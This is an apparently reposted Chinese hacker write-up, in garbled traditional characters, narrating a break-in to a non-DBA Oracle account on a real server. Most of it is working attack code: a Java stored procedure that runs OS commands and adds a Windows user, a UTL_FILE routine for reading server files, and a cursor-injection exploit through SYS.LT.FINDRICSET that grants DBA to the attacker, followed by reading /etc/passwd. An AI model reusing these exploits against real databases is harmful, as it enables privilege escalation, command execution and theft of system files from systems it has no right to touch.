入侵Oracle服務(wù)器進(jìn)一步獲取權(quán)限

很快便連接上Oracle服務(wù)器，此時(shí)發(fā)現(xiàn)：

　　1.連接后不是dba權(quán)限

　　2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權(quán)限

　　3.運(yùn)行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后發(fā)現(xiàn)Oracle服務(wù)器不能連接網(wǎng)絡(luò)。
-
 

　　幸運(yùn)的是，

　　運(yùn)行

　　create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

　　成功!這個(gè)用戶具有create proceduce權(quán)限。

　　此時(shí)馬上想到創(chuàng)建java擴(kuò)展執(zhí)行命令：

　　create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

　　begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘<>’, ‘execute’ );end;

　　create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

　　select * from all_objects where object_name like ‘%LINX%’

　　grant all on LinxRunCMD to public

　　select LinxRunCMD(‘cmd /c net user linx /add’) from dual

　　但是在第一步就卡住了，服務(wù)器由于某種未知原因 不能創(chuàng)建java擴(kuò)展!!

　　還好，我們還有UTL庫可以利用：

　　create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

　　fHandler UTL_FILE.FILE_TYPE;

　　buf varchar2(4000);

　　output varchar2(8000);

　　BEGIN

　　fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

　　loop

　　begin

　　utl_file.get_line(fHandler,buf);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

　　exception

　　when no_data_found then exit;

　　end;

　　output := output||buf||chr(10);

　　end loop;

　　UTL_FILE.FCLOSE(fHandler);

　　return output;

　　END;

　　UTL_FILE_DIR需要先用：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　指定目。但運(yùn)行后發(fā)現(xiàn)沒有權(quán)限。只好想辦法提權(quán)。

　　***************游標(biāo)注射***************

　　老外寫了N個(gè)pdf介紹這技術(shù)，我精簡了代碼：

　　DECLARE

　　MYC NUMBER;

　　BEGIN

　　MYC := DBMS_SQL.OPEN_CURSOR;

　　DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

　　raise NO_DATA_FOUND;

　　EXCEPTION

　　WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　END;

　　運(yùn)行后重新連接就有dba權(quán)限了，簡單吧……

　　現(xiàn)在可以讀取文件了：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　select LinxUTLReadfile(‘passwd’) from dual

　　后面就簡單了，不寫了。

服務(wù)器租用/服務(wù)器托管中國五強(qiáng)！虛擬主機(jī)域名注冊頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]